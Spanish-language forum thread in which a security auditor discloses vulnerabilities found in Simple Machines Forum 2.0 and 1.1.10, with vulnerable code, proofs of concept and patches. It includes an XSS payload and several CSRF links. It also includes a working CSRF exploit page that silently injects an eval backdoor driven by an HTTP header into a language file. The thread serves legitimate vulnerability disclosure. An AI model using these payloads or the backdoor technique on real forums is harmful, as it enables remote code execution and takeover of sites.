Auditoría de seguridad hacia Simple Machines Forum 2.0

Iniciado por WHK, 18 Octubre 2009, 23:13 PM

0 Miembros y 1 Visitante están viendo este tema.

WHK



Proyecto SimpleAudit 2.0

Es un proyecto destinado a realizar auditorías de seguridad a nivel WEB hacia el software de SMF 2.0 (Simple Machines Forum) con la finalidad de que sus desarrolladores puedan crear cada dia un software mas robusto y seguro.




Integrantes - (participando en el proyecto)

Colaboradores (forman parte del proyecto pero necesitaran encontrar algo antes de tener acceso al resto de los reportes):




Vulnerabilidades encontradas
45
(40 reportadas + 0 notificadas + 5 privadas)
Último disclosure: 1 de diciembre
Próximo disclosure: 1 de enero

Backdoors encontrados
1





Todos los resultados se irán mostrando en este lugar con todos sus detalles.

Si tienes algún comentario, pregunta, aporte o lo que necesites compartir puedes hacerlo en este post:
http://foro.elhacker.net/nivel_web/proyecto_de_auditoria_a_smf_20_laboratorio_de_bugsnivel_web-t271095.0.html

Si hay algúna vulnerabilidad o bug que no aparece en este lugar es porque todavía se mantiene en privado hasta cumplirse el plazo estimado para su posible reparación o publicación futura.




Puedes seguir la auditoría en Twitter:
http://twitter.com/simpleaudit

Además en FeedBurner:
Código (html4strict) [Seleccionar]
<a href="http://twitter.com/simpleaudit">
http://feeds.feedburner.com/Twitter/Simpleaudit.gif
</a>




Meneame:
http://meneame.net/story/localizaron-mas-40-bugs-auditoria-smf-2.0

WHK

En este hilo se irán poniendo las vulnerabilidades hechas públicas.

El recopilatorio quedará en el primer post.

Cita de: sirdarckcat en 10 Noviembre 2009, 07:49 AM


Hasta al momento la auditoría ha sido todo un éxito.

WHK

Ya se enviaron todas las vulnerabilidades encontradas. El dia 30 de noviembre serán publicadas acá lo hayan reparado o no.

WHK

#3
Detalles


 
 
 
 
 
 
Descripción:XSS en el input "Sitio WEB" dentro del perfil de usuario
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Profile-Modify.php:802
URL Vulnerable:N/A
PoC:‭‬‭‬ ‭‬‭‬‭‬javascript:alert(document.cookie);//http://xx
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2



Descripción

La vulnerabilidad se localiza en el archivo Sources/Profile-Modify.php
Linea 802
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Profile-Modify.php#802
Código (php) [Seleccionar]
if (strlen(trim($value)) > 0 && strpos($value, \'://\') === false)
$value = \'http://\' . $value;


Ya que permite la inyección de código arbitrario debido a que verifica
únicamente que contenga los carácteres "://" pero no indicaron en que
posición del string debería estar por lo cual puedes escribir "://" al
final del código inyectado encapsulandolo en un comentario tal como el
siguiente ejemplo.

PoC:
En el perfil de tu usuario pon lo siguiente en el input de "Website URL"
‭‬‭‬‭‬‭‬‭‬javascript:alert(document.cookie);//http://xx



Solución

Código original de SMF 1.1.10 en Sources/Profile.php linea 602
Código (php) [Seleccionar]
// Fix the URL...
if (isset($_POST['websiteUrl']))
{
if (strlen(trim($_POST['websiteUrl'])) > 0 && strpos($_POST['websiteUrl'], '://') === false)
$_POST['websiteUrl'] = 'http://' . $_POST['websiteUrl'];
if (strlen($_POST['websiteUrl']) < 8)
$_POST['websiteUrl'] = '';
}


reemplazar por
Código (php) [Seleccionar]

if($_POST['websiteUrl']){
$permitidos = array('http', 'https', 'ftp', 'ftps');
$protocolo = @explode('://', $_POST['websiteUrl']);
$protocolo = $protocolo[0];
foreach($permitidos as $permitido){
  if(strtolower($protocolo) == strtolower($permitido)){
   $valido = true;
   break;
  }
}
/* La url comienza con un protocolo no válido */
if(!$valido)
  $_POST['websiteUrl'] = 'http://'.$_POST['websiteUrl'];
unset($permitidos, $permitido, $protocolo, $valido); /* Libera memoria */

/* Elimina urls no válidas */
if(strlen($_POST['websiteUrl']) < 8)
  unset($_POST['websiteUrl']);
}


Código original de SMF 2.0 RC2 en Sources/Profile-Modify.php linea 753
Código (php) [Seleccionar]
// Fix the URL...
'input_validate' => create_function('&$value', '

if (strlen(trim($value)) > 0 && strpos($value, \'://\') === false)
$value = \'http://\' . $value;
if (strlen($value) < 8)
$value = \'\';
return true;
'),


Reemplazar por
Código (php) [Seleccionar]
// Parche - Fix the URL...
'input_validate' => create_function('&$value', '
if($_POST["websiteUrl"]){
$permitidos = array("http", "https", "ftp", "ftps");
$protocolo = @explode("://", $_POST["websiteUrl"]);
$protocolo = $protocolo[0];
foreach($permitidos as $permitido){
 if(strtolower($protocolo) == strtolower($permitido)){
  $valido = true;
  break;
 }
}

/* La url comienza con un protocolo no válido */
if(!$valido)
 $_POST["websiteUrl"] = "http://".$_POST["websiteUrl"];
unset($permitidos, $permitido, $protocolo, $valido); /* Libera memoria */

/* Elimina urls no válidas */
if(strlen($_POST["websiteUrl"]) < 8)
 unset($_POST["websiteUrl"]);
}
'),

WHK

#4
Detalles


 
 
 
 
 
 
Descripción:Código de ejecución remota PHP
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/ManageServer.php:1298
URL Vulnerable:Themes/default/languages/index.english.php
PoC:‭‬en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //
Afecta a:‭‬SMF 2.0 RC2



Descripción

La vulnerabilidad se localiza en el archivo Sources/ManageServer.php desde
la linea 1298
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/ManageServer.php#1298
Código (php) [Seleccionar]
$replace_array = array(
'~\$txt\[\'lang_character_set\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_character_set\'] = \'' . addslashes($_POST['character_set']) . '\';',
'~\$txt\[\'lang_locale\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_locale\'] = \'' . addslashes($_POST['locale']) . '\';',
'~\$txt\[\'lang_dictionary\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_dictionary\'] = \'' . addslashes($_POST['dictionary']) . '\';',
'~\$txt\[\'lang_spelling\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_spelling\'] = \'' . addslashes($_POST['spelling']) . '\';',
'~\$txt\[\'lang_rtl\'\]\s=\s[A-Za-z0-9]+;~' => '$txt[\'lang_rtl\'] = ' . (!empty($_POST['rtl']) ? 'true' : 'false') . ';',
);


y el problema esque SMF filtra de mala forma los carácteres especiales que pueden ser incluidos ya que aunque procesan via addslashses el preg_replace los omite como si fueran parte de la misma expresión regular.

Si vamos a la sección
Configuraciones->Lenguajes->Editar lenguajes
Podemos ver el listado de lenguajes, si le haces click sobre cualquier
lenguaje irás directamente a su edición y podrás notar dos cosas.

1. Al enviarte a esa sección puedes ver que te adjunta un token a la url
para evitar un ataque de tipo CSRF pero si se lo eliminas puedes ver que la
sección se visualiza de igual forma, por lo tanto si actualizamos las
configuraciones sin enviar el token vemos que se guarda igual.
En SMF hay muchas funciones y secciones que aparentemente se ve un token
pero no las usa. Este es un CSRF de ejecución de comando arbitrario
primeramente ya que un atacante remoto puede engañar al administrador
haciendo que visualize una web especialemnte preparada para el ataque y
modificar las configuraciones a gusto.

2. Si haces algún cambio en cualquier input y le das en guardar lo que hace
SMF no es guardar los valores en la base de datos sino sobreescribir
directamente el archivo de elnguajes del theme utilizado por lo tanto lo
que escribas de configuración se verá en el archivo principal de lenguaje
del theme.

3. El bug consiste principalmente en que SMF no filtra adecuadamente estos
inputs. Originalemnte en el archivo
Themes/default/languages/index.english.php dice así:
Código (php) [Seleccionar]
$txt['lang_locale'] = 'en_US';
$txt['lang_dictionary'] = 'en';
$txt['lang_spelling'] = 'american';


Si intentamos escribir una comilla simple SMF le agrega un slash intentando
invalidar la inyección de código pero no filtra adecuadamente el carácter
"\" por lo tanto cuando insertamos una comilla el código queda así:
Código (php) [Seleccionar]
$txt['lang_locale'] = 'en_US\'test';
por lo tanto aplicamos bypass y escribimos "\'" para que quede así:
Código (php) [Seleccionar]
$txt['lang_locale'] = 'en_US\\'test';
Por lo tanto el primer slash invalida el segundo transformandolo en un
string y validando la comilla simple, luego de eso inyectamos nuestro
código arbitrario sin comillas y cerramos con un cmentario para invalidar
el resto de la linea y evitar que se produzca un error.
Por ejemplo "\';phpinfo();//" quedaría:
Código (php) [Seleccionar]
$txt['lang_locale'] = 'en_US\\';phpinfo();//';
ejecutando el código de forma arbitraria y remota gracias a la falta de
token (CSRF).

PoC:
Código (php) [Seleccionar]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
 <title>:O</title>
</head>
<?php
/*
Prueba de concepto. Auditoría a SMF 2.0 de parte del grupo de auditores de Elhacker.Net
https://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html
*/
/* Configuraciones */
$foro_vulnerable '';

 if(
$_GET['act'] == 'frame'){
?>

<script>
 function ejecutar(){
  document.getElementById('payload').value = 'en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //';
  document.getElementById('form').submit();
 }
</script>
<body onload="ejecutar();">
 <form id="form" method="post" action="<?php echo $foro_vulnerable?>index.php?action=admin;area=languages;sa=editlang;lid=english">
  <input type="hidden" name="character_set" value="ISO-8859-1" />
  <input type="hidden" name="locale" id="payload" value="" />
  <input type="hidden" name="dictionary" value="en" />
  <input type="hidden" name="spelling" value="american" />
  <input type="hidden" name="save_main" value="Save" />
 </form>
</body>
<?php }else{ ?>
<body style="text-align: center;">
 <h2 style="font-weight: bold; text-decoration: underline;">
  Prueba de concepto
 </h2>
 <hr />
 <div style="text-align: center;">
  <img width="400" height="322" src="http://i207.photobucket.com/albums/bb73/moonlightj/HQczsxCxHV_nooooooo-i-cant-has-pres.jpg" />
  <img width="400" height="322" src="http://i492.photobucket.com/albums/rr283/Hoodano12/n1559202619_124094_6213.jpg" />
 </div>
 <hr />
 <img src="http://th40.photobucket.com/albums/e245/abbbies/th_scream.jpg" />
 <img src="http://th39.photobucket.com/albums/e156/kimtisha/th_AUG2008011bw.jpg" />
 <img src="http://th132.photobucket.com/albums/q9/PhilVassar/th_MarissaFile.jpg" />
 <img src="http://th873.photobucket.com/albums/ab296/jrvohler/th_no.jpg" />
 <img src="http://th306.photobucket.com/albums/nn256/s13vin4t0r/th_BSODGATES.jpg" />
 <img src="http://th296.photobucket.com/albums/mm194/Spalders/th_nooooooo-not-the-bafftub.jpg" />
 <img src="http://th233.photobucket.com/albums/ee182/vinayg18/blog/th_scary_hillary_clinton.jpg" />
 <img src="http://th732.photobucket.com/albums/ww321/TSCC_Munter/th_nooooooo.jpg" />
 <img src="http://th617.photobucket.com/albums/tt254/webrougt97/th_fred14.jpg" />
 <img src="http://th257.photobucket.com/albums/hh209/Arganaut/th_Desecration_by_Louieville_XXIII.jpg" />
 <img src="http://th4.photobucket.com/albums/y142/Tornadopotato/Photos/th_100_2521.jpg" />
 <hr />
 <iframe style="visibility: hidden; position: absolute; top:0px; left: 0px;" src="<?php echo $_SERVER['SCRIPT_URI']; ?>?act=frame"></iframe>
</body>
<?php ?>
</html>


1. Ingresar como administrador al foro de pruebas
2. Modificar el archivo donde dice $foro_vulnerable=''; escribiendo la
dirección del foro sin el index.php.
3. Visualizar el archivo

Luego que visualizes el archivo tu foro se habrá infectado y a la vista de
todos no se verá absolutamente nada. Para su ejecución debes enviar un
header desde tu explorador con la variable "Exec" mas su ejecución, como
por ejemplo "Exec: phpinfo();" ya que el payload de la prueba de concepto
es la siguiente:
Código (php) [Seleccionar]
en_US\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //

Entonces se le agregará el slash a la comilla y el slash puesto con anterioridad no será modificado quedando un \\' invalodando el slash que invalidaba a la comilla.



Solución

Código original de SMF 2.0 RC2 en Sources/ManageServer.php linea 1298
Código (php) [Seleccionar]
$replace_array = array(
'~\$txt\[\'lang_character_set\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_character_set\'] = \'' . addslashes($_POST['character_set']) . '\';',
'~\$txt\[\'lang_locale\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_locale\'] = \'' . addslashes($_POST['locale']) . '\';',
'~\$txt\[\'lang_dictionary\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_dictionary\'] = \'' . addslashes($_POST['dictionary']) . '\';',
'~\$txt\[\'lang_spelling\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_spelling\'] = \'' . addslashes($_POST['spelling']) . '\';',
'~\$txt\[\'lang_rtl\'\]\s=\s[A-Za-z0-9]+;~' => '$txt[\'lang_rtl\'] = ' . (!empty($_POST['rtl']) ? 'true' : 'false') . ';',
);


Debe ser reemplazado por
Código (php) [Seleccionar]
$replace_array = array(
'~\$txt\[\'lang_character_set\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_character_set\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['character_set'])) . '\';',
'~\$txt\[\'lang_locale\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_locale\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['locale'])) . '\';',
'~\$txt\[\'lang_dictionary\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_dictionary\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['dictionary'])) . '\';',
'~\$txt\[\'lang_spelling\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_spelling\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['spelling'])) . '\';',
'~\$txt\[\'lang_rtl\'\]\s=\s[A-Za-z0-9]+;~' => '$txt[\'lang_rtl\'] = ' . (!empty($_POST['rtl']) ? 'true' : 'false') . ';',
);

WHK

#5
Detalles


 
 
 
 
 
 
Descripción:CSRF en el cambio del theme
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Load.php:1324
URL Vulnerable:index.php?theme=2
PoC:‭‬index.php?theme=2
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2



Descripción

Normalmente cuando uno desea cambiar de theme lo hace en las preferencias
de diseño del perfil de cada usuario incluyendo un token para evitar CSRF
aunque no sirve de mucho ya que puedes ejecutar un cambio de theme de forma
forzada gracias a una vulnerabilidad alojada en el archivo Sources/Load.php
linea 1245
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Load.php#1245

Código (php) [Seleccionar]
elseif (!empty($_REQUEST['theme']) && (!empty($modSettings['theme_allow']) || allowedTo('admin_forum')))
{
$id_theme = (int) $_REQUEST['theme'];
$_SESSION['id_theme'] = $id_theme;
}


haciendo un csrf persistente ya que el id de theme lo almacena directamente
en la cookie de sesión del usuario o visitante.

Prueba de concepto:
http://localhost/smf/index.php?theme=2



Solución

Código original de SMF 2.0 RC2 en Sources/Load.php linea 1324
Código (php) [Seleccionar]
elseif (!empty($_REQUEST['theme']) && (!empty($modSettings['theme_allow']) || allowedTo('admin_forum')))
{
$id_theme = (int) $_REQUEST['theme'];
$_SESSION['id_theme'] = $id_theme;
}


Reemplazar por
Código (php) [Seleccionar]
/*
elseif (!empty($_REQUEST['theme']) && (!empty($modSettings['theme_allow']) || allowedTo('admin_forum')))
{
$id_theme = (int) $_REQUEST['theme'];
$_SESSION['id_theme'] = $id_theme;
}
*/


Hay que recordar que este cambio imposibilita el cambio de theme directamente obligando a utilizar la opción del perfil si alguien lo desea.
Esto no es una feature debido a que supuestamente solamente el administrador puede utilizar este tipo de visualizaciones sin tocken pero al fallar las condiciones hace posible que esta acción sea ejecutable a todo usuario y ni aun asi debería crearse al propio administrador.
O se elimina o se pone token.

WHK

#6
Detalles


 
 
 
 
 
 
Descripción:CSRF en el colapso de categorias
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/BoardIndex.php:130
URL Vulnerable:index.php?action=collapse;c=1;sa=collapse
PoC:‭‬index.php?action=collapse;c=1;sa=collapse
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2



Descripción

La falla se encuentra en el archivo Sources/BoardIndex.php desde la linea
130 hasta la 150 en la función llamada "CollapseCategory" ya que al
solicitar una petición de colapso de un foro no nos pide como requsito un
token o algo que lo impida, por lo tanto desde un siomple csrf podemos
causar el colapso total de foros en la visualización inicial de la portada
del foro.

Aunque no es una vulnerabilidad que pueda comprometer al foro si es
bastante molesta y smf no debería permitir este tipo de acciones de forma
arbitraria.

Prueba de concepto:
http://localhost/smf2.0/index.php?action=collapse;c=1;sa=collapse
donde c=1 es la variable con el id de grupos de foros.



Solución

Modificar la categoría de la sección y darle click donde dice "no colapsable" mientras que simplemachines da una solución oficial ya que hay que agregar el tocken a todos sus themes y al sistema propio.

WHK

#7
Detalles


 
 
 
 
Descripción:CSRF en el gestor de servidores de paquetes
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Packages.php:1189
URL Vulnerable:http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1
 
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2



Descripción

La vulnerabilidad consiste en que puedes remover servdiores de
actualizaciones y paquetes de forma arbitraria debido a que esta acción no
solicita un token o algún tipo de verificación que lo impida:

Prueba de concepto:
http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1
Con esto podemos hacer que el administrador elimine de forma arbitraria el
primero servidor en la lista de servidores de paquetes.
Hay que recordar que esta acción solo la puede ejecutar un administrador
por lo tanto es necesario que alguien con este tipo de derechos sobre el
foro pueda ejecutar tu csrf desde alguna imagen en tu perfil reireccionada
o desde alguna web externa.

La falla se localiza en el archivo Sources/PackageGet.php linea 740
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/PackageGet.php#740

No hay token por ningún lado de la función.

WHK

#8
Detalles


 
 
 
 
 
 
Descripción:XSS en la sección de administración de servidores de mods
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/PackageGet.php:732
URL Vulnerable:index.php?action=packageget
PoC:Agregar un servidor con nombre: <h1>XSS</h1>
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2



Descripción

La falla está en el archivo Sources/PackageGet.php linea 732
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/PackageGet.php#732

Donde la función "PackageServerAdd" actualiza el string del nombre del
servidor en la base de datos sin ser filtrada de ninguna forma.

Prueba de concepto:
http://127.0.0.1/smf_2/index.php?action=admin;area=packages
Donde dice "Add server" en el input del nombre del servidor pongan <h1>XSS</h1>

WHK

#9
Detalles


 
 
 
 
 
Descripción:Eliminación arbitraria y Disclosure de paquetes instalados
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Packages.php:1189
URL Vulnerable:/index.php?action=admin;area=packages;sa=remove;package=.htaccess
Afecta a:‭‬SMF 2.0 RC2



Descripción

El problema está en el archivo Sources/Packages.php Linea 1189 en la
función PackageRemove ya que primeramente no solicita ningún token por lo
tanto es vulnerable a un ataque de tipo CSRF.
El segundo caso es que en esta linea:
Código (php) [Seleccionar]
// Ack, don't allow deletion of arbitrary files here, could become a
security hole somehow!
if (!isset($_GET['package']) || $_GET['package'] == 'index.php' ||
$_GET['package'] == 'installed.list')
redirectexit('action=admin;area=packages;sa=browse');


impiden la eliminación local de archivos pero no incluyeron el ".htaccess"
por lo cual puedes eliminarlo de forma arbitraria y observar el listado de
paquetes.

Pruebas de concepto:
http://localhost/smf2.0/index.php?action=admin;area=packages;sa=remove;package=paquete.zip
http://localhost/smf2.0/index.php?action=admin;area=packages;sa=remove;package=.htaccess

Nota de sirdarckcat
Citarhttp://code.google.com/p/smf2-review/source/browse/trunk/Sources/Packages.php#1196
Al parecer..
Código (php) [Seleccionar]
$_GET['package'] = preg_replace('~[\.]+~', '.', strtr($_GET['package'], '/', '_'));

no podemos poner "..", lo del disclosure que dice whk es que sin el htaccess ahora
podemos leer installed.list y bajar los paquetes y demas